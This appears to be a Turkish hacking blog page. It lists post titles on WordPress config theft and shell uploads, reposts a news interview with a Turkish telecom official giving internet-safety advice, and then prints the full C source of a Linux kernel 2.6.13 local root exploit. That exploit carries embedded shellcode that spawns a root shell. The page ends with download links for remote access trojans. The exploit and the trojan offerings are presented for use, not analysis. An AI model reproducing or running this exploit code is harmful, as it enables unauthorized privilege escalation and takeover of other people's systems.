4 Eylül 2015 Cuma
Wordpress Config Bilgilerini Çekme [Revslider]
Xampp Açıgının Kullanımı [Video]
18 Mayıs 2015 Pazartesi
Airties Modem Port Açma
Wordpress Shell ve İndex Atma
Wordpress Toplu Config Çekme ve Hackleme
15 Mayıs 2015 Cuma
İnternette Dolandırıcılık, Dikkat Edilmesi Gerekenler !
Ekleyen:
Admin
Tarih:
Cuma, Mayıs 15, 2015
Tüm dünyada internet üzerinden dolandırıcılık hikayeleri artarken, Telekomünikasyon İletişim Başkanlığı (TİB) İnternet Daire Başkanı Osman Nihat Şen, net kullanıcılarından alışkanlıklarını değiştirmelerini istedi. Dolandırıcılıktan korunmak için birinci kural ise bedava programlardan uzak durmak. Her gelen maili de açmayın. 10 mailden 8’i bilgisayarınızı ele geçirme amacında
Pek çok insanın günde 7-8 saatini başında geçirdiği internet, artık kişilerin hem özel hayatını, hem kariyerini hem de banka hesaplarını tehdit ederken, Telekomünikasyon İletişim Başkanlığı (TİB) İnternet Daire Başkanı Osman Nihat Şen, internettin zararlarından korunma yollarını anlattı. Milyonlarca insan sitelere girip bedava müzik ve görüntü indirirken, Şen, bedava olan müzik, video, oyun ve müstehcenlik sitelerinin, aslında internetteki banka hesaplarımıza erişmek için kurulan tuzaklar olduğuna dikkat çekti. AKŞAM’a konuşan Şen, internet kullanan vatandaşların dikkat etmesi gereken temel kuralları sıraladı. İşte Şen’in verdiği internet kullanma taktikleri şöyle:
BEDAVA PROGRAM İNDİRMEYİN
İnterneti kuralına göre kullanan kişi, bilgisayar güvenliğiyle ilgili sorun yaşamaz. Kurallar nedir: Bilgisayarınızdaki hiçbir şey kopya ya da çalıntı olmamalı. İsterseniz en basit fotoğraf programı olsun, internetten bedava indiriyorsunuz. Hayatta kimse kimseye bedava bir şey verir mi? Kırtasiyeden en küçük A4 kağıdı isteyince bile ’senin olsun’ demez kimse. Birinci kural: Bilmediğiniz ve güvenmediğiniz programları kullanmayın. Size bir şey sunan insanlar onunla birlikte içine virüs gibi kötücül yazılımlar ekleyerek veriyor. Bunlar güvenli değil.
GELEN 10 MESAJIN 8’İNİ AÇMA
İkinci kural: Her gelen e -posta ve mesajı açmayın. Her 100 mesajın 80’i istenmeyen mesaj. Size gelen 10 mailin 8 tanesini hiç açmamanız lazım. Teknoloji o kadar ilerledi ki, herhangi bir kişi internetten bir program bulup, açtığınız maille sizin bilgisayarınıza virüs bulaştırabilir. Çok kolay bunlar. O yüzden her e-postayı açıp okumamanız gerekiyor.
YASAL MÜZİK İMKANINI KULLANIN
Güvenliğinden emin olmadığınız sitelere girmeyin. Bir web sitesinde gezinirken o site sizin bilgisayarınıza zararlı yazılım indiriyor. Siz resim, müzik, video indirdiğinizde, isteyerek bilgisayarınıza bir şey inmesini kabul ediyorsunuz. Kullanıcı isterse içeri girmek çok kolay. Kullanıcı, müzik ve video indirerek sürekli zararlı yazılım alıyor. İndirmeden izleyenler de risk altında. Onlarda da bilgisayarınıza çerez, kuki denen kötü yazılımlar iniyor. Bilgisayarınıza inen kötücül yazılımlarla maddi ve manevi zarara uğrarsınız. Yasal müzik imkanlarını kullanın. Çok küçük miktar ödemeyeyim diye düşünürseniz banka hesabınız boşalıyor.
ADINIZA PORNO SİTESİNE YORUM YAZILIYOR
SON dönemde hızla artan yeni bir sorun daha var. İnsanlar sizinle ilgili bilgi temin etmek için internetten bilgi arıyor. Kişilerin itibarını zedelemek için farklı siteler açıyorlar. Siyasette yetkin, etkili kişiler ile kamudaki kişilerle ilgili bayağı bu tür site açıldı. Sizinle ilgili site açıp sizle ilgili olumsuz bilgi giriyorlar. Bilgisayarı ele geçirmeye de gerek yok. Daha kolay yapılıyor. Bize gelen şikayetten gördüğümüz, vatandaş kendisiyle ilgili olumsuz içeriğin nasıl önleneceğini çok merak ediyor. Bu çok önemli bir gündem. Vatandaşlarla ilgili de bunu çok yapıyorlar. Kişisel husumet ya da düşmanlıktan oluyor. Bayanlar için özellikle şunu yapıyorlar: Bir porno ya da müstehcenlik sitesinin yorum bölümüne kişinin adını yazıyorlar. Arama motoruna kişinin adını yazınca direkt o site geliyor. Çalışan kadınlar çok sıkıntı çekiyor. Benim o siteyle işim yok diye yüzü kızarıyor.
ANNE KIZLIK SOYADINI ALIYOR
BİR kişiyle ilgili temin edilmesi en zor şey, annesinin kızlık soyadı. Nasıl temin edilir acaba diye düşününce, mesela, Facebook’ta ’dayı, dayıoğlu’ gibi ifadelerin geçtiği tabirleri arıyor. Sosyal medyada paylaşım sitelerinde bu tabir geçiyorsa tamam diyip anne kızlık soyadını buluyor. Sonradan bu kareler yan yana gelince insan ne yaptığını sonradan anlıyor. Doğum tarihi gibi verileri de yine mail trafiğinden, sitelere kayıt alırken ya da Facebook gibi sitelerden buluyor.
PROFİL FOTOĞRAFLARINA DİKKAT ET
Facebook’tan fotoğrafın çalınıp müstehcen sitelere konması da oluyor. Herkesle bilgilerinizi paylaşmayın. Facebook’a koyduğumuz fotoğraflara dikkat edelim. Eğer o bilgisayarı başka kişiler de kullanıyorsa daha da dikkat edelim.
EN ÇOK VİRÜS MÜSTEHCEN RESİMLERDEN
EN çok zararlı yazılım bulaştıran internet sitesi, müstehcenlik siteleri. Çünkü bu sitelere giren herkes bilgisayarıma ne verirseniz alırım diyor. Orada alma sınırı da yok, insanlar sürekli görüntü ve resim alıyor. O sırada sürekli bilgisayarınıza zararlı yazılım yüklüyor. Müzik, video, kumar ve müstehcenlik siteleri zararlı yazılımların bilgisayara yüklenmesine aracılık ediyor. Bu zararlı yazılımlar da kişisel verilerinizin ele geçirilmesine neden oluyor.
KORSANLAR KİŞİSEL BİLGİLERİNİZİ HACK’LEME PEŞİNDE
KORSANLAR, banka hesaplarına ulaşmak için kişilerle ilgili kişisel verilere ulaşmaya çalışıyor. Adı, soyadı, TC kimlik numarası, anne kızlık soyadı, doğum tarihi ve yeri gibi bilgilere erişiyorlar. Kiminle mailleştiğinizi takibe alıyorlar. Mailiniz izlenirse kişisel bilgileriniz edinilir. Mail adresinizi izlemek için şifreyi bulmalı. Şifreyi bulmak da kolay. İnsanları tuzağa düşürmek için bir takım müstehcen ya da müzik siteleri açıyorlar. Girince diyorlar ki, bedava mailini yaz; kaydol. Mail adreslerinizle birlikte şifrenizi hatırlamak için bir de soru istiyor. Böylece şifrenizi ve gizli sorunuzu öğreniyor. Kişinin bu işlemlerdeki şifre ile banka işlemi şifresi ya aynı ya da benzer oluyor. Onlar çok yakın zincir içinde kombinasyonlarını üreterek şifreye ulaşıyor.
BİLGİSAYARLARIMIZ BAŞKASININ KONTROLÜNDE
İNTERNET güvenliğindeki en büyük risklerden birisi, sizin bilgisayarınızın başkası tarafından kullanılması. MSN, Hotmail ve Facebook şifresinin çalınması ve internetten bankacılık işlemlerinde yaşanan sorunların nedeni de bu. 5-6 yıldır internet bankacılığı kullanan ve hiç sorun yaşamayan insanlar var. Neden, çünkü bilgisayarına hiç müzik indirmiyor. Eğer indirme işlemi yapıyorsam o bilgisayarda banka işlemi yapmam. Ya da bilgisayarı belli aralıklarla bütün ayarları başlangıç ayarlarına ***ürüyorum. Bilgisayar korsanları, şimdi de sizin bilgisayarınızı ele geçirip köle bilgisayar yapıyorlar. İnternette bir yere saldıracak olan korsanlar, bunu köle bilgisayarla yapıyor. İnsanların bilgisayarını köleleştirmek için önce insanların ilgisini çekecek siteler kurma ve mail atma gibi araçları deniyor.
HER GÖRDÜĞÜN KİŞİYLE İNTERNET ARKADAŞI OLMA
NORMALDE tanımadığınız kişilere fotoğrafınızı gösterir misiniz. O zaman neden internete resimlerinizi koyuyorsunuz. Fotoğrafındaki üniforması ve internete koydukları bilgilerle çocuklara kadar ulaşılabilir. Çocuklar emin olmadığı kişilerle konuşmamalı ve kiminle konuşacağını kendisi belirlemeli. Her gördükleri kişiyle internette arkadaş olmamalı.
PORNO SİTE MAĞDURLARI ARTIYOR
MÜSTEHCENLİK sitelerine üye olmayın. Reklam yolluyor, bedava üye oluyorsun. Ya da 30 TL’ye sana günlük 20 tane resim ve video göndereceğim diyor. Bu tür para yollayan o kadar çok kişi var ki... Bu tür siteler kesinlikle dolandırıcılık. Kesinlikle bir şey yollamıyorlar. Müstehcenlikte bu konu çok sınırsız şekilde gidiyor. Çünkü konuşulamıyor. Bize gelen şikayetlere göre çok mağdur var. Premium üyelik oluyor. Hem parası hem de şifresi gidiyor. Bir de üstüne video da yollamıyor.
ŞİFRESİ ÇALINAN SAVCILIĞA GİTSİN
- HOTMAİL şifreniz çalınınca kesinlikle savcılığa suç duyurusunda bulunmanız lazım. Süreci savcılık yürütüyor, kayıtlara girmesi lazım. Savcılığa gidip şifrem şu tarihte çalındı, o tarihten sonra MSN’i kullananlar ben değilim diyecek. Savcılık da Microsoft’un temsilciliğine, o tarihten sonra Hotmail ya da MSN’e hangi IP adresinden girildiğini soracak. Facebook’ta da süreç aynı. Savcılığa suç duyurusu, o tarihten sonra giren IP adresinin Facebook’un temsilciliğinden istenmesi işlemleri aynen yapılıyor. Zanlı durumuna düşebilirsiniz.
Sitelerde hakaret edilen vatandaş ne yapacak?
- VATANDAŞLAR böyle bir durumla karşılaşınca ne yapması gerektiğini, o siteye nasıl ulaşarak, kendisiyle ilgili içeriği nasıl çıkaracağını bilmiyor. Burada öncelikle sitenin iletişim kısmındaki yetkililere, içeriğin çıkarılması için başvuruda bulunmanız gerekir. Talebiniz iki gün içinde karşılanmazsa 15 gün içinde yerleşim yerinizdeki sulh ceza mahkemesine başvurarak mağduriyetinizin giderilmesini isteyin. Eğer sitede iletişim bilgisi yoksa, internet.tib.gov.tr adresinden iletişim bilgilerine ulaşılabilir. Site de yargı kararını uygulamazsa hapis cezası var.
ÇOCUK KENDİ İSMİNİ YAZMASIN
OYUN sitelerinde de yavaş yavaş problem artmaya başladı. Çocuklar üzerinden sıkıntı daha da büyüyor. Çocukların, oyunun şifresini nasıl kırarım, şu leveli nasıl atlarım gibi gündemleri var. İnternette de o tür sitelere girip bu bilgileri arıyorlar. Kötü niyetli kişiler, kişisel aile ve adres bilgilerinin hepsini oyunda çocuktan alıyorlar. Oyun oynayan çocuk kendi ismini yazmasın.
İNTERNETE ZAMAN SINIRI
İNTERNETTE sorun yaşamamak için zaman sınırlaması yapın. İnsan günde 10 saat uyumaz, 10 saat yürüyüp 10 saat yemek yiyemez. Ama Türkiye’de günde 7 saat oyun oynayan çocuklar var. Zaman sınırlaması yapmayınca karşınıza çıkacak problemleri yönetemiyorsunuz. İstemediğiniz kişilerle sohbet edip istemediğiniz sitelerden bilgi alabiliyorsunuz. Öyle bir hale geliyor ki, bilgisayarınızı riske sokmak için gereken her şeyi yapıyorsunuz.
Kontör isteyene aldanmayın MSN şifresi kırılması sorunu çok fazla. Çok fazla insan şifresini çaldırıyor. Çalan kişi, listesindeki bütün irtibatlarına onun adına mesaj, hakaret mesajı yolluyor ya da kontör istiyor. O esnada sizin internette yaptığınız özel bilgileri de alıyorlar. Mesela, bankacılıkla ilgili işlemler. Fatura ödeme havale işlemleri bayağı gelişti. Bu esnada sizin o bilgileriniz başkaları tarafından ele geçirilebiliyor. Sizin hotmail ve MSN şifreniz nasıl çalınıyor, demek ki, o bilgisayarınızda ekstra program çalışıyor. Sizin olmadığınız saatte bilgisayarınıza girip şifrenizi çalıyor.
Linux kernel 2.6.13 local root Exploit
Ekleyen:
Admin
Tarih:
Cuma, Mayıs 15, 2015
Kod:
/*
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm Angel Injection member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
#####################################################
# Title: linux kernel 2.6.13 local root exploit #
# Author: Angel Injection #
# Home: http://1337day.com #
# Thanks To: Inj3ct0r Team #
#####################################################
**
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <sched.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/prctl.h>
#include <sys/mman.h>
#include <sys/wait.h>
#include <linux/a.out.h>
#include <asm/unistd.h>
static struct exec ex;
static char *e[256];
static char *a[4];
static char b[512];
static char t[256];
static volatile int *c;
/* shell code */
__asm__ (" __excode: call 1f \n"
" 1: mov $23, %eax \n"
" xor %ebx, %ebx \n"
" int $0x80 \n"
" pop %eax \n"
" mov $cmd-1b, %ebx \n"
" add %eax, %ebx \n"
" mov $arg-1b, %ecx \n"
" add %eax, %ecx \n"
" mov %ebx, (%ecx) \n"
" mov %ecx, %edx \n"
" add $4, %edx \n"
" mov $11, %eax \n"
" int $0x80 \n"
" mov $1, %eax \n"
" int $0x80 \n"
" arg: .quad 0x00, 0x00 \n"
" cmd: .string \"/bin/sh\" \n"
" __excode_e: nop \n"
" .global __excode \n"
" .global __excode_e \n"
);
extern void (*__excode) (void);
extern void (*__excode_e) (void);
void
error (char *err)
{
perror (err);
fflush (stderr);
exit (1);
}
/* exploit this shit */
void
exploit (char *file)
{
int i, fd;
void *p;
struct stat st;
printf ("\ntrying to exploit %s\n\n", file);
fflush (stdout);
chmod ("/proc/self/environ", 04755);
c = mmap (0, 4096, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, 0, 0);
memset ((void *) c, 0, 4096);
/* slow down machine */
fd = open (file, O_RDONLY);
fstat (fd, &st);
p =
(void *) mmap (0, st.st_size, PROT_READ | PROT_WRITE, MAP_PRIVATE, fd, 0);
if (p == MAP_FAILED)
error ("mmap");
prctl (PR_SET_DUMPABLE, 0, 0, 0, 0);
sprintf (t, "/proc/%d/environ", getpid ());
sched_yield ();
execve (NULL, a, e);
madvise (0, 0, MADV_WILLNEED);
i = fork ();
/* give it a try */
if (i)
{
(*c)++;
!madvise (p, st.st_size, MADV_WILLNEED) ? : error ("madvise");
prctl (PR_SET_DUMPABLE, 1, 0, 0, 0);
sched_yield ();
}
else
{
nice(10);
while (!(*c));
sched_yield ();
execve (t, a, e);
error ("failed");
}
waitpid (i, NULL, 0);
exit (0);
}
int
main (int ac, char **av)
{
int i, j, k, s;
char *p;
memset (e, 0, sizeof (e));
memset (a, 0, sizeof (a));
a[0] = strdup (av[0]);
a[1] = strdup (av[0]);
a[2] = strdup (av[1]);
if (ac < 2)
error ("usage: binary <big file name>");
if (ac > 2)
exploit (av[2]);
printf ("\npreparing");
fflush (stdout);
/* make setuid a.out */
memset (&ex, 0, sizeof (ex));
N_SET_MAGIC (ex, NMAGIC);
N_SET_MACHTYPE (ex, M_386);
s = ((unsigned) &__excode_e) - (unsigned) &__excode;
ex.a_text = s;
ex.a_syms = -(s + sizeof (ex));
memset (b, 0, sizeof (b));
memcpy (b, &ex, sizeof (ex));
memcpy (b + sizeof (ex), &__excode, s);
/* make environment */
p = b;
s += sizeof (ex);
j = 0;
for (i = k = 0; i < s; i++)
{
if (!p[i])
{
e[j++] = &p[k];
k = i + 1;
}
}
/* reexec */
getcwd (t, sizeof (t));
strcat (t, "/");
strcat (t, av[0]);
execve (t, a, e);
error ("execve");
return 0;
}
# 1337day.com [2011-10-30]
SpyCronic Rat İndir
Spy Net Rat v2.6 İndir
Kaydol:
Kayıtlar
(
Atom
)